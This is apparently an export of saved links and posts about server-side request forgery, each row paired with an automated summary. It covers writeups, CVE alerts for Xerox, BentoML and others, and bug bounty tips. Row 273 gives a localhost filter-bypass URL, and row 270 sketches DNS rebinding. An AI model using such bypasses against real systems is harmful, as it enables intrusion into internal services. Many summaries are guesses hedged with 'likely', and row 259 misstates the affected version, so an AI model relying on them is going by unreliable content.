| 225 | 2025-08-14 03:54:10 UTC | jdonsec/AllThingsSSRF: This is a collection of writeups, cheatsheets, video | The content is about a GitHub repository called "jdonsec/AllThingsSSRF" which contains a collection of writeups, cheatsheets, and videos related to Server-Side Request Forgery (SSRF). It seems to be a resource for individuals interested in learning more about SSRF vulnerabilities and how to address them. |
| 226 | 2025-08-14 03:54:08 UTC | https://link.medium.com/PJvAUvSFvZ | |
| 227 | 2025-08-14 03:54:06 UTC | https://link.medium.com/eYV17swFvZ | |
| 228 | 2025-08-14 03:54:04 UTC | https://github.com/SpiderMate/B-XSSRF | The link provided leads to a GitHub repository for a tool called B-XSSRF. It is likely a tool related to Cross-Site Scripting (XSS) and Server-Side Request Forgery (SSRF) vulnerabilities. The content on the GitHub page likely includes information about the tool, its purpose, features, and instructions for usage. It is recommended to visit the link to explore the tool further and understand its capabilities in addressing XSSRF vulnerabilities. |
| 229 | 2025-08-14 03:54:00 UTC | SSRF in the Wild. A totally unscientific analysis of… \| by Vickie Li \| The | The content titled "SSRF in the Wild" by Vickie Li discusses Server-Side Request Forgery (SSRF) vulnerabilities observed in real-world scenarios. The article likely provides an informal analysis of SSRF occurrences without scientific rigor. It may explore practical examples, implications, and potential risks associated with SSRF attacks. The focus is on understanding how SSRF vulnerabilities manifest in the wild rather than a formal study. |
| 230 | 2025-08-14 03:53:58 UTC | https://link.medium.com/oa2D2LupcZ | |
| 231 | 2025-08-14 03:53:56 UTC | GitHub - allanlw/svg-cheatsheet: A cheatsheet for exploiting server-side SV | The content is about a GitHub repository named "svg-cheatsheet" created by allanlw. It is described as a cheatsheet for exploiting server-side SVG. The repository likely contains information, code snippets, or resources related to leveraging SVG (Scalable Vector Graphics) for server-side applications. It may provide guidance on how to use SVG effectively in server-side environments. |
| 232 | 2025-08-14 03:53:54 UTC | Server Side Request Forgery Prevention - OWASP Cheat Sheet Series | The content is about preventing Server Side Request Forgery (SSRF) and is part of the OWASP Cheat Sheet Series. SSRF is a vulnerability where an attacker can manipulate a server into making unintended requests, potentially accessing internal systems or sensitive data. The OWASP Cheat Sheet provides guidance on how to prevent SSRF attacks, which typically involve validating and sanitizing user input, restricting access to sensitive resources, and using whitelists to control allowed URLs. It is crucial for developers and security professionals to be aware of SSRF risks and implement preventive measures to secure their systems. |
| 233 | 2025-08-14 03:53:52 UTC | Server Side Request Forgery (SSRF) - Book of BugBounty Tips | The content is titled "Server Side Request Forgery (SSRF) - Book of BugBounty Tips." It likely discusses SSRF, a security vulnerability where an attacker can manipulate a server to make requests on their behalf. The content may provide tips and insights related to SSRF in bug bounty programs. |
| 234 | 2025-08-14 03:53:50 UTC | Bypassing SSRF Protection. There’s always more to do… \| by Vickie Li \| Medi | The content titled "Bypassing SSRF Protection" by Vickie Li discusses methods to bypass Server-Side Request Forgery (SSRF) protection measures. It highlights the continuous need for vigilance and improvement in security practices to prevent SSRF attacks. The article likely delves into techniques or strategies that attackers can use to circumvent SSRF protections, emphasizing the importance of staying updated on security measures to defend against such threats effectively. |
| 235 | 2025-08-14 03:53:48 UTC | https://link.medium.com/JzxK9eodaX | |
| 236 | 2025-08-14 03:53:46 UTC | https://link.medium.com/HOGdT5ocfW | |
| 237 | 2025-08-14 03:53:44 UTC | The journey of Web Cache Firewall Bypass to SSRF to AWS credentials compr | The content discusses the progression from a Web Cache Firewall Bypass to Server-Side Request Forgery (SSRF) and ultimately obtaining AWS credentials through this process. It highlights the evolution of exploiting vulnerabilities, starting with bypassing web cache firewalls, moving on to SSRF attacks, and culminating in the compromise of AWS credentials. This journey showcases the potential risks and consequences of such security vulnerabilities being exploited by malicious actors. |
| 238 | 2025-08-14 03:53:40 UTC | From SSRF To RCE in PDFReacter. What is PDFReacter? - PDFReacter is a… \| b | The content appears to discuss a potential security vulnerability in PDFReacter that could allow an attacker to escalate from Server-Side Request Forgery (SSRF) to Remote Code Execution (RCE). PDFReacter is likely a software or tool that processes PDF files. The focus seems to be on the security implications of this vulnerability and how it could be exploited by malicious actors. |
| 239 | 2025-08-14 03:53:38 UTC | Vimeo SSRF with code execution potential. - Harsh Jaiswal - Medium | The content discusses a security vulnerability in Vimeo that could lead to Server-Side Request Forgery (SSRF) with code execution potential. The vulnerability was identified by Harsh Jaiswal and is detailed in a Medium post. SSRF can be exploited to make unauthorized requests from the server, potentially leading to code execution. This type of vulnerability can pose a significant risk to the security of a system or application. It is crucial for organizations to address and patch such vulnerabilities promptly to prevent exploitation by malicious actors. |
| 240 | 2025-08-14 03:53:36 UTC | https://medium.com/@arbazhussain/svg-xlink-ssrf-fingerprinting-libraries-version-450ebecc2f3c | The content discusses a security vulnerability related to SVG xlink in libraries, leading to SSRF attacks and version fingerprinting. It highlights how attackers can exploit this vulnerability to gather information about the libraries used by a website. The article emphasizes the importance of addressing this issue to prevent potential security breaches. |
| 241 | 2025-08-14 03:53:34 UTC | SSRF — Server Side Request Forgery (Types and ways to exploit it) Part-2 \| | The content discusses SSRF (Server Side Request Forgery), focusing on its types and ways to exploit it. It likely delves into the vulnerabilities associated with SSRF attacks and the methods attackers can use to exploit them. The article may provide insights into how SSRF can be used to manipulate servers into making unauthorized requests and accessing sensitive information. It is part two of a series, suggesting that it builds upon previous information shared in part one. |
| 242 | 2025-08-14 03:53:32 UTC | SSRF’s up! Real World Server-Side Request Forgery (SSRF) | The content mentions Server-Side Request Forgery (SSRF) and its real-world implications. SSRF is a security vulnerability where an attacker can manipulate a server to make requests on their behalf. This can lead to unauthorized access to internal systems, data theft, or server exploitation. It is crucial for developers to be aware of SSRF risks and implement proper security measures to prevent such attacks. |
2432025-08-14 03:53:30 UTCSSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1 |The content is about SSRF (Server Side Request Forgery), focusing on its types and ways to exploit it. It appears to be the first part of a series discussing SSRF vulnerabilities and exploitation techniques. The content likely delves into the various forms of SSRF attacks and methods to leverage them for unauthorized access or data manipulation. This introductory part sets the stage for a deeper exploration of SSRF in subsequent parts of the series.
2442025-08-14 03:53:28 UTC0xdf hacks stuff | CTF solutions, malware analysis, home lab development0xdf hacks stuff is a platform that offers solutions for Capture The Flag (CTF) challenges, guides for malware analysis, and tips for developing a home lab environment. It focuses on sharing expertise in these areas to help individuals enhance their skills in cybersecurity and information security. The website provides valuable resources and insights for those interested in CTF competitions, analyzing malware, and setting up a home lab for practical learning and experimentation.
245 | 2025-08-14 03:53:24 UTC | AWS takeover through SSRF in JavaScript – Gwendal Le Coguic | The content appears to discuss a potential security vulnerability known as Server-Side Request Forgery (SSRF) in JavaScript that could lead to an AWS takeover. This vulnerability could allow an attacker to manipulate a web application to make unauthorized requests to AWS services, potentially gaining control over them. It is important for developers to be aware of SSRF vulnerabilities and take steps to prevent them in their applications to protect against such attacks.
246 | 2025-08-14 03:53:22 UTC | Security Bugs in Practice: SSRF via Request Splitting | The content discusses the practical implications of a security bug known as SSRF (Server-Side Request Forgery) that occurs through request splitting. SSRF allows attackers to manipulate a server into making unauthorized requests on their behalf. This vulnerability can be exploited to access sensitive information or resources on a server. The article likely delves into the technical details and potential risks associated with SSRF via request splitting, highlighting the importance of addressing such vulnerabilities to enhance system security.
247 | 2025-08-14 03:53:20 UTC | Into the Borg – SSRF inside Google production network | OpnSec | The content titled "Into the Borg – SSRF inside Google production network | OpnSec" likely discusses a security vulnerability known as Server-Side Request Forgery (SSRF) within Google's production network. The article may delve into the implications of SSRF and how it could potentially be exploited within Google's infrastructure. The content is likely related to cybersecurity and may provide insights into the challenges and risks associated with SSRF vulnerabilities in a high-profile environment like Google's network.
248 | 2025-08-14 03:53:18 UTC | Server Side Request Forgery (SSRF) Testing | by NoGe | InfoSec Write-ups | The content is about Server Side Request Forgery (SSRF) Testing, written by NoGe in an InfoSec Write-up. It likely covers information related to testing for SSRF vulnerabilities, which involve manipulating a server to make unintended requests on behalf of the attacker. The article may provide insights, techniques, or tools for identifying and mitigating SSRF risks in web applications.
249 | 2025-08-14 03:53:12 UTC | How i converted SSRF TO XSS in jira. | by Ashish Kunwar | Medium | The content titled "How i converted SSRF TO XSS in jira" by Ashish Kunwar on Medium likely discusses a security vulnerability where Server-Side Request Forgery (SSRF) was converted to Cross-Site Scripting (XSS) in Jira. The author may explain how they identified and exploited this vulnerability, potentially highlighting the impact and implications of such a conversion. This content likely delves into the technical details of the vulnerability and the process of exploiting it to achieve XSS in the Jira platform.
250 | 2025-08-11 20:13:15 UTC | Critical vulnerabilities in Xerox FreeFlow Core v8.0.4 (CVE-2025-8355 & CVE-2025-8356) could lead to SSRF & RCE attacks. Update to v8.0.5 immediately to secure your systems. Link: thedailytechfeed.com/critical-vulne #Vulnerabilities #Xerox #FreeFlow #CVE #Security #Update #SSRF #RCE | Critical vulnerabilities (CVE-2025-8355 & CVE-2025-8356) in Xerox FreeFlow Core v8.0.4 pose risks of SSRF & RCE attacks. Immediate update to v8.0.5 is necessary for system security. Visit thedailytechfeed.com/critical-vulne for more information. #Vulnerabilities #Xerox #FreeFlow #CVE #Security #Update #SSRF #RCE.
251 | 2025-08-11 19:02:17 UTC | CVE-2025-8355: Xerox Issues Urgent Security Update | Xerox has released an urgent security update for CVE-2025-8355. The update addresses a critical security vulnerability in Xerox devices. Users are advised to apply the patch immediately to protect their systems from potential cyber threats. Stay informed about security updates and take necessary actions to safeguard your devices.
252 | 2025-08-11 14:04:05 UTC | Xerox FreeFlow Core v8.0.4 has 2 critical flaws: CVE-2025-8355 SSRF CVE-2025-8356 Path Traversal RCE Fix: Update to v8.0.5 now! Paxion Cybersecurity helps organizations stay ahead of threats like these. #CyberSecurity #Xerox #Infosec #RCE #SSRF | Xerox FreeFlow Core v8.0.4 has two critical flaws: CVE-2025-8355 (SSRF) and CVE-2025-8356 (Path Traversal leading to RCE). The solution is to update to v8.0.5 immediately to address these vulnerabilities. Paxion Cybersecurity assists organizations in proactively managing such threats. #CyberSecurity #Xerox #Infosec #RCE #SSRF
253 | 2025-08-11 10:56:27 UTC | Xerox FreeFlow Vulnerabilities leads to SSRF and RCE Attacks | Xerox FreeFlow software vulnerabilities have been identified, potentially enabling Server-Side Request Forgery (SSRF) and Remote Code Execution (RCE) attacks. These vulnerabilities pose security risks that could allow malicious actors to manipulate server requests and execute unauthorized code. It is crucial for users of Xerox FreeFlow software to be aware of these vulnerabilities and take necessary precautions to mitigate the associated risks.
254 | 2025-08-11 10:56:25 UTC | Xerox FreeFlow Flaws Enable SSRF and Remote Code Execution | The Xerox FreeFlow software has vulnerabilities that allow Server-Side Request Forgery (SSRF) attacks and remote code execution. These flaws can be exploited by attackers to manipulate requests from the server and execute malicious code remotely. It poses a significant security risk and highlights the importance of patching software to prevent exploitation.
256 | 2025-08-02 15:28:35 UTC | Just wrapped up the SSRF HR room on @RealTryHackMe! Learned how attackers misuse servers to reach internal services & how to defend against it. Up next: more hands-on security challenges! tryhackme.com/room/ssrfhr #CyberSecurity #SSRF #TryHackMe #Infosec | The content discusses completing a room on SSRF HR on TryHackMe, focusing on attackers misusing servers to access internal services and defense strategies. The next step involves engaging in more hands-on security challenges. The post emphasizes cybersecurity, SSRF awareness, and TryHackMe participation.
257 | 2025-07-31 03:23:26 UTC | Another Byte Bites the Dust - How XBOW Turned a Blind SSRF into a File Reading Oracle - xbow.com/blog/xbow-titi by @pwntester / @Xbow #SSRF #LFI #FileDisclosure #SecurityResearch #BugBounty #CloudSecurity #WebSecurity #OffensiveSecurity #AppSec #PathTraversal | The content discusses how XBOW converted a blind SSRF vulnerability into a file reading oracle. It highlights the importance of security research, bug bounty programs, and cloud/web security. The post mentions relevant hashtags like SSRF, LFI, FileDisclosure, and PathTraversal. The focus is on offensive security and application security. The content also includes a link to further information.
258 | 2025-07-30 16:19:07 UTC | #CVE-2025-54381 | BentoML - Unauthenticated SSRF (Critical) #BentoML versions 1.4.0 to 1.4.18 are vulnerable to an unauthenticated Server-Side Request Forgery (#SSRF) due to improper validation of user-provided URLs in file upload handlers. This allows attackers to force the | BentoML versions 1.4.0 to 1.4.18 have a critical unauthenticated SSRF vulnerability (#CVE-2025-54381) due to inadequate validation of user-provided URLs in file upload handlers. Attackers can exploit this flaw to trigger SSRF.
259 | 2025-07-30 09:18:47 UTC | CVE-2025-54381: Critical SSRF in BentoML BentoML is an open-source Python framework to package & deploy ML models as APIs. Versions 1.4.19 let attackers trigger internal HTTP requests via uploads. Patch now! #CVE202554381 #BentoML #SSRF #Python #MachineLearning #AI #MLOps | A critical Server-Side Request Forgery (SSRF) vulnerability (CVE-2025-54381) has been identified in BentoML, an open-source Python framework for deploying ML models as APIs. Attackers can exploit version 1.4.19 to trigger internal HTTP requests through uploads. It is crucial to apply the patch immediately to mitigate this security risk. #BentoML #SSRF #Python #MachineLearning #AI #MLOps.
260 | 2025-07-30 02:18:53 UTC | A critical SSRF vulnerability in BentoML's file upload handling allows unauthenticated remote attackers to perform internal network reconnaissance and steal cloud metadata credentials from AI applications. #BentoML #SSRF #AISecurity #CVE #Cybersecurity | A serious SSRF vulnerability in BentoML's file upload feature enables unauthenticated remote attackers to conduct internal network reconnaissance and extract cloud metadata credentials from AI applications. This flaw poses a significant security risk and highlights the importance of addressing vulnerabilities promptly to prevent unauthorized access and data breaches. #BentoML #SSRF #AISecurity #CVE #Cybersecurity
261 | 2025-07-28 16:46:24 UTC | Severe Salesforce Tableau Vulnerabilities Enable Remote Code Execution | The content discusses severe vulnerabilities in Salesforce Tableau that allow remote code execution. These vulnerabilities pose a significant threat to the security of Tableau users, potentially enabling attackers to execute malicious code on affected systems. It highlights the importance of promptly addressing these vulnerabilities to prevent unauthorized access and potential data breaches. Users are advised to stay informed about security updates and patches released by Salesforce to mitigate the risks associated with these vulnerabilities.
262 | 2025-07-28 06:13:30 UTC | HIGH-severity SSRF flaw in ssrfcheck 1.2.0 lets attackers target multicast IPs! Update now to stay secure. #OffSeq #SSRF #infosec | A high-severity SSRF flaw in ssrfcheck 1.2.0 allows attackers to target multicast IPs. It is crucial to update to the latest version for security. Stay secure by taking immediate action to address this vulnerability. #OffSeq #SSRF #infosec.
263 | 2025-07-28 03:03:45 UTC | Salesforce patched eight critical flaws in Tableau Server, including RCE, database exposure and SSRF vulnerabilities, urging users to update immediately. #TableauServer #SalesforceSecurity #RCE #SSRF #CybersecurityAlert securityonline.info/rce-ssrf-data- | Salesforce addressed eight critical vulnerabilities in Tableau Server, such as RCE, database exposure, and SSRF issues, advising users to promptly update their systems. This urgent security alert highlights the importance of staying protected against cyber threats. #TableauServer #SalesforceSecurity #RCE #SSRF #CybersecurityAlert.
264 | 2025-07-27 18:03:54 UTC | Critical SSRF vuln (CVE-2025-8228) found in ChanCMS = 3.1.2! Attackers can exploit targetUrl for unauthorized access to internal server resources. Protect your systems: UPDATE to v3.1.3 immediately! #CyberSecurity #Vulnerability #SSRF tenable.com/cve/CVE-2025-8 | A critical SSRF vulnerability (CVE-2025-8228) was discovered in ChanCMS version 3.1.2, allowing attackers to exploit the 'targetUrl' and gain unauthorized access to internal server resources. It is crucial to update to version 3.1.3 immediately to protect systems. The vulnerability poses a significant risk to cybersecurity and highlights the importance of staying vigilant against such threats. More information can be found at tenable.com/cve/CVE-2025-8.
265 | 2025-07-24 17:13:36 UTC | Ethical Disclaimer: This content is provided for educational purposes only. Do not test or exploit any system without explicit permission. #BugBounty #XSS #SSRF #CyberSecurity #FilterBypass #PayloadCrafting #WebAppSecurity #EthicalHacking #InfoSecEducation #RedTeam | The content serves educational purposes only, cautioning against testing or exploiting systems without permission. It includes hashtags related to cybersecurity topics like Bug Bounty, XSS, SSRF, Filter Bypass, Payload Crafting, Web App Security, Ethical Hacking, InfoSec Education, and Red Team. The ethical disclaimer emphasizes responsible behavior in the realm of cybersecurity and hacking practices.
266 | 2025-07-23 21:31:34 UTC | CISA Issues Alert on Exploited SysAid Vulnerabilities: Patch Deadline August 13 | The Cybersecurity and Infrastructure Security Agency (CISA) has issued an alert regarding exploited vulnerabilities in SysAid software. Users are urged to apply patches by August 13 to mitigate the risks associated with these vulnerabilities. Failure to patch could leave systems exposed to potential cyber threats. Stay updated on security alerts and take prompt action to protect your systems.
267 | 2025-07-23 08:01:33 UTC | CISA Warns: SysAid Flaws Under Active Attack Enable Remote File Access and SSRF | The Cybersecurity and Infrastructure Security Agency (CISA) issued a warning about active attacks targeting vulnerabilities in SysAid software. These flaws allow attackers to access files remotely and conduct Server-Side Request Forgery (SSRF) attacks. Organizations using SysAid should be vigilant and apply patches to mitigate the risk of exploitation.
268 | 2025-07-23 07:43:48 UTC | New #CVE Record: CVE-2025-8020 All #Snyk versions of the package private-ip are #vulnerable to Server-Side Request Forgery (#SSRF) where an attacker can provide an IP or #hostname that resolves to a #multicast IP address (224.0.0.0/4) which is not included as part of the private | The content discusses a new CVE record, CVE-2025-8020, indicating that all Snyk versions of the package private-ip are vulnerable to Server-Side Request Forgery (SSRF). This vulnerability allows an attacker to input an IP or hostname that resolves to a multicast IP address (224.0.0.0/4), not included in the private IP range. This poses a security risk.
269 | 2025-07-23 02:53:31 UTC | A critical unauthenticated SSRF vulnerability (CVE-2025-54122 CVSS 10.0) in Manager's accounting software allows bypassing network isolation and exfiltrating sensitive data from cloud environments. #Managerio #SSRF #Cybersecurity #CloudHack #Accounting | A severe unauthenticated SSRF vulnerability (CVE-2025-54122, CVSS 10.0) in Manager's accounting software enables circumventing network isolation and extracting sensitive data from cloud environments. This flaw poses a significant cybersecurity risk and highlights the importance of addressing vulnerabilities promptly to prevent potential data breaches. #Managerio #SSRF #Cybersecurity #CloudHack #Accounting
270 | 2025-07-22 21:03:45 UTC | App blocks 127.0.0.1? Cool. Register a domain pointing to it. Use a DNS rebinding service like: Custom NS server A record to 127.0.0.1 Then call: App thinks it's external. #bugbounty #ssrf | The content discusses a technique to bypass an app blocking 127.0.0.1 by registering a domain pointing to it and using a DNS rebinding service. By setting up a custom NS server with an A record to 127.0.0.1, the app can be tricked into thinking the connection is external. This method is suggested for bug bounty and SSRF (Server-Side Request Forgery) purposes.
271 | 2025-07-22 01:38:40 UTC | CRITICAL SSRF in Manager-io Manager! Unauthenticated attackers can access internal data. Patch to 25.7.21.2525 ASAP. #OffSeq #SSRF #CyberSecurity | A critical Server-Side Request Forgery (SSRF) vulnerability in Manager-io Manager allows unauthenticated attackers to access internal data. It is advised to patch the system to version 25.7.21.2525 immediately to mitigate the risk. This vulnerability poses a serious threat to cybersecurity and highlights the importance of timely updates and vigilance against SSRF attacks. #OffSeq #SSRF #CyberSecurity.
272 | 2025-07-20 04:28:44 UTC | SSRF = Server-Side Request Forgery Target makes HTTP request on your behalf. Try: url= url= Sometimes it leads to AWS keys. #ssrf #BugBounty #infosec | SSRF (Server-Side Request Forgery) involves a target making HTTP requests on your behalf, potentially exposing AWS keys. This vulnerability is commonly targeted in Bug Bounty programs and falls under the realm of information security. The content emphasizes the risks associated with SSRF and encourages further exploration of the topic through provided URLs and hashtags.
273 | 2025-07-19 09:38:37 UTC | SSRF Vulnerability Internal Port Scanning & Non-sensitive File Read Bypassed with: http://[0:0:0:0:0:ffff:127.0.0.1] (Localhost IPv6-mapped IPv4) #BugBounty #ssrf | The content discusses a security vulnerability known as SSRF (Server-Side Request Forgery) where internal port scanning and non-sensitive file reading were bypassed using a specific URL format: http://[0:0:0:0:0:ffff:127.0.0.1]. This URL represents a localhost IPv6-mapped IPv4 address. The post highlights this bypass technique in the context of a Bug Bounty program.
274 | 2025-07-17 18:18:36 UTC | eWPTX 3 months Premium: $299.50 (50% off) Advanced blind #SQLinjection techniques DOM-based #XSS exploitation Server-side request forgery (#SSRF) chains And more! Hands-on training that separates script kiddies from security pros. | Get eWPTX certification plus 3 months Premium access for $299.50 (50% off). The course covers advanced blind SQL injection techniques, DOM-based XSS exploitation, SSRF chains, and more. It offers hands-on training to distinguish between amateurs and security professionals.
277 | 2025-07-17 03:43:14 UTC | Rooted in stillness The Banyan tree reminds us to grow inward toward the soul. Discover how at #SpiritualWisdom #InnerGrowth #SSRF #BanyanTree #SpiritualPractice #SpiritualSymbols | The content highlights the symbolism of the Banyan tree, encouraging inner growth towards the soul through stillness. It invites exploration of spiritual wisdom, inner growth, and spiritual practices associated with the Banyan tree as a spiritual symbol. The message emphasizes the importance of introspection and connecting with one's inner self for personal development and spiritual enlightenment.
278 | 2025-07-16 16:18:26 UTC | Just dropped a banger: How I Used SSRF to Gain Admin Access Thread or blog your call Medium: Substack (free): #bugbounty #infosec #cybersecurity #ethicalhacking #ssrf #websecurity | The content discusses using Server-Side Request Forgery (SSRF) to gain admin access, shared as a thread or blog post. It is available on Medium and Substack for free. The focus is on bug bounty, infosec, cybersecurity, ethical hacking, SSRF, and web security. The post highlights the author's success in utilizing SSRF for gaining admin privileges.
280 | 2025-07-14 14:04:27 UTC | All about SSRF !! Different ways to test SSRF #ssrf #cybersecurity #BugBounty #Security #vulnerability | The content discusses Server-Side Request Forgery (SSRF) and various methods to test for it, emphasizing its relevance in cybersecurity, bug bounty programs, and vulnerability assessments. It provides insights into identifying and mitigating SSRF risks, highlighting the importance of understanding and addressing this security issue. The content aims to educate readers on the significance of SSRF testing in enhancing system security and protecting against potential exploits.
281 | 2025-07-12 06:58:26 UTC | Blind SSRF via Burp Collaborator 1. App fetches URLs (PDF gen, webhook, etc.) 2. Send URL pointing to Burp Collaborator 3. No visible response but OAST logs the request 4. Confirms SSRF vulnerability No output no bug #bugbounty #ssrf #burp #oast | The content discusses a method for exploiting a Blind SSRF vulnerability using Burp Collaborator. It involves sending URLs to Burp Collaborator through an application that fetches URLs like PDF generation or webhooks. Despite no visible response, the Out-of-Band Application Security Testing (OAST) logs the request, confirming the SSRF vulnerability. The key takeaway is that even if there is no visible output, the presence of an SSRF vulnerability should not be overlooked. This information is relevant for bug bounty hunters and those interested in web security testing.
282 | 2025-07-12 05:31:44 UTC | Apache HTTP Server 2.4.64 Update Patches Eight Security Vulnerabilities | The Apache HTTP Server 2.4.64 update addresses eight security vulnerabilities. This update aims to enhance the security of the server by patching these vulnerabilities. It is crucial for users to install this update promptly to protect their systems from potential security threats.
283 | 2025-07-12 04:02:26 UTC | (PDF) Surgical stabilization of rib fractures improves survival in functionally dependent trauma patients | The study suggests that surgical stabilization of rib fractures can enhance survival rates in trauma patients who are functionally dependent. The procedure may offer significant benefits for this specific patient population.
284 | 2025-07-11 12:16:34 UTC | Apache HTTP Server 2.4.64 Released With Patch for 8 Vulnerabilities | Apache HTTP Server version 2.4.64 has been released to address 8 vulnerabilities. This update includes patches to fix these security issues. Users are advised to update their Apache HTTP Server installations to the latest version to ensure their systems are protected against potential exploits.
285 | 2025-07-09 20:48:55 UTC | Kicked things off by finding a Blind SSRF vulnerability; unfortunately it turned out to be a duplicate. Still it feels great to be back in the game. Hoping for better luck ahead! #BugBounty #SSRF #Cybersecurity #HackerLife | The content describes finding a Blind SSRF vulnerability, only to discover it was a duplicate. Despite this setback, the individual is excited to be back in the cybersecurity game and is hopeful for better opportunities in the future. The post includes hashtags related to Bug Bounty, SSRF, Cybersecurity, and Hacker Life.
286 | 2025-07-09 10:48:30 UTC | A10:2021 Server-Side Request Forgery (SSRF) Attackers trick your server into making requests to unintended internal or external resources. Be careful where your server is reaching out! #SSRF #NetworkSecurity | A10:2021 highlights Server-Side Request Forgery (SSRF) attacks where attackers manipulate servers to make unauthorized requests. It warns about the risks of servers accessing unintended internal or external resources. The importance of vigilance in monitoring server connections is emphasized for maintaining network security. #SSRF #NetworkSecurity.
287 | 2025-07-09 07:46:27 UTC | CISA Adds Four Critical Vulnerabilities to KEV Catalog Due to Active Exploitation | The Cybersecurity and Infrastructure Security Agency (CISA) has identified and added four critical vulnerabilities to the Known Exploited Vulnerabilities (KEV) catalog due to ongoing exploitation. These vulnerabilities pose significant risks to systems and networks, prompting CISA to highlight them for immediate attention and mitigation. Organizations are advised to prioritize patching these vulnerabilities to enhance their cybersecurity posture and protect against potential attacks.
288 | 2025-07-08 13:46:27 UTC | CISA Warns of Zimbra Collaboration Suite (ZCS) Vulnerability Exploited in Attacks | The Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning about a vulnerability in the Zimbra Collaboration Suite (ZCS) being exploited in attacks. The vulnerability poses a risk to organizations using ZCS, potentially allowing malicious actors to compromise systems. Organizations are advised to apply patches and implement necessary security measures to protect against exploitation.
289 | 2025-07-07 12:48:54 UTC | SSRF (Server-Side Request Forgery) lets attackers trick a server into making requests to internal or external systems. Can expose internal data & services. Always validate user-supplied URLs. #SSRF #CyberSecurity #BugBounty | SSRF allows attackers to manipulate servers to make unauthorized requests to internal or external systems, risking exposure of sensitive data. To prevent this, it's crucial to validate user-provided URLs to mitigate SSRF vulnerabilities. This practice enhances cybersecurity and is essential for bug bounty programs. #SSRF #CyberSecurity #BugBounty
290 | 2025-07-06 16:33:46 UTC | Understanding #SSRF: Abusing Server Trust from the Inside Out blog.sucuri.net/2025/06/unders | The content discusses Server-Side Request Forgery (SSRF) attacks, focusing on exploiting server trust from within the system. It highlights the risks associated with SSRF attacks and how attackers can manipulate servers to access sensitive information or perform malicious actions. The article aims to increase awareness about SSRF vulnerabilities and the importance of securing servers to prevent such attacks. It provides insights into how attackers can abuse server trust and offers guidance on mitigating these risks to enhance cybersecurity measures.
291 | 2025-07-06 12:43:34 UTC | Breaking down a SSRF bypass using open redirect chaining reveals how trusting external redirects can lead to internal network scans and access to sensitive data. Proper validation and allowlisting are key to prevention. #OpenRedirect #SSRF | The content discusses how combining SSRF bypass with open redirect chaining can lead to internal network scans and unauthorized access to sensitive data. It emphasizes the risks of trusting external redirects and highlights the importance of implementing proper validation and allowlisting to prevent such security breaches. The post underscores the significance of addressing vulnerabilities related to open redirects and SSRF to safeguard against potential exploitation.
292 | 2025-07-06 04:33:22 UTC | Class Complete! Yesterday we wrapped up an epic session on SSRF exploitation including payloads, live demos and real-world tricks. Wanna fly with us together from the Next Class? Call/Message Us 91-8790407216 Email | The content highlights the completion of a session on SSRF exploitation with demonstrations of payloads and real-world tricks. It invites participation in the next class and provides contact information for inquiries: call/message +91-8790407216 or email.
293 | 2025-07-04 21:38:20 UTC | Just dropped a new write-up in my Power Platform research series. This time? OneNote token leakage. Yep, it's still exploitable. Nope, it's not getting fixed. Read it on Zenity Labs: Enjoy the read #SSRF #PowerPlatform #OneNote #MSRC #ZenityLabs | A new write-up in the Power Platform research series discusses OneNote token leakage, highlighting that the issue is still exploitable and won't be fixed. The content can be found on Zenity Labs. The post mentions hashtags like #SSRF, #PowerPlatform, #OneNote, #MSRC, and #ZenityLabs.
294 | 2025-07-03 13:23:41 UTC | Excited to start my WebHacking journey with @HackingHub_io! Ready to learn, grow and hack some web apps! #BugBounty #EthicalHacking #NahamSec #WebSecurity #HackingHub #Infosec #CyberSecurity #BugBountyTips #XSS #SSRF #CTF #Pentesting #HackThePlanet | The content expresses excitement about starting a web hacking journey with @HackingHub_io to learn, grow, and hack web apps. It mentions hashtags related to bug bounty, ethical hacking, web security, infosec, cybersecurity, bug bounty tips, XSS, SSRF, CTF, pentesting, and hacking the planet. The individual is eager to engage in activities related to cybersecurity and hacking, showcasing enthusiasm for exploring these fields.
295 | 2025-07-03 12:21:48 UTC | Hacker says DarkForums is leaking IPs | A hacker has claimed that DarkForums is exposing users' IP addresses. The information was shared through a link provided in the content.
296 | 2025-07-03 06:28:21 UTC | New Writeup Alert! "One SSRF to Rule Them All" by Ott3rly is now live on IW! Check it out here: #cybersecurity #informationsecurity #bugbounty #bugbountywriteup #ssrf | A new writeup titled "One SSRF to Rule Them All" by Ott3rly is now available on IW. The content focuses on cybersecurity, information security, bug bounty programs, and SSRF vulnerabilities. Readers are encouraged to check out the writeup for insights and information on this topic. #cybersecurity #informationsecurity #bugbounty #bugbountywriteup #ssrf.
297 | 2025-07-02 17:23:23 UTC | New video alert! We walk you through an SSRF vulnerability exploited step-by-step to achieve RCE. Practical, detailed and perfect for pentesters & bug bounty hunters! Video: #Cybersecurity #SSRF #RCE #BugBounty | A new video demonstrates exploiting an SSRF vulnerability to achieve Remote Code Execution (RCE) in a step-by-step guide, ideal for pentesters and bug bounty hunters. The video provides practical and detailed insights into the process. It focuses on cybersecurity, SSRF, RCE, and bug bounty topics.
298 | 2025-07-02 14:18:17 UTC | Ever wondered how attackers exploit SSRF to access internal systems? Our latest article breaks it all down: tools, techniques and mitigation strategies. Read now: #SSRF #CyberSecurity #RedTeamOps #Infosec #CyberWarFareLabs #Article #SecurityResearch | The content discusses how attackers exploit Server-Side Request Forgery (SSRF) to access internal systems, detailing tools, techniques, and mitigation strategies. The article provides insights into SSRF vulnerabilities and ways to protect against them. It is relevant for those interested in cybersecurity, Red Team Operations, and security research. The link provided directs readers to the full article for further information.
299 | 2025-07-02 13:19:00 UTC | Union-Based SQL Injection in 60 Seconds See how a single UNION SELECT reveals sensitive data Real demo. Real database dump. Real threat. Watch the full demo now no jargon just clarity: youtube.com/shorts/FTx4UEJ #sqli #bugbounty #bug #ssrf #sqlinjection #cybersecurity | The content discusses Union-Based SQL Injection demonstrated in a 60-second video showing how a single UNION SELECT can expose sensitive data through a real database dump. The video aims to raise awareness about this security threat without using technical jargon. It encourages viewers to watch the full demo on YouTube for clarity. The post includes hashtags related to SQL injection, bug bounty, SSRF, and cybersecurity.
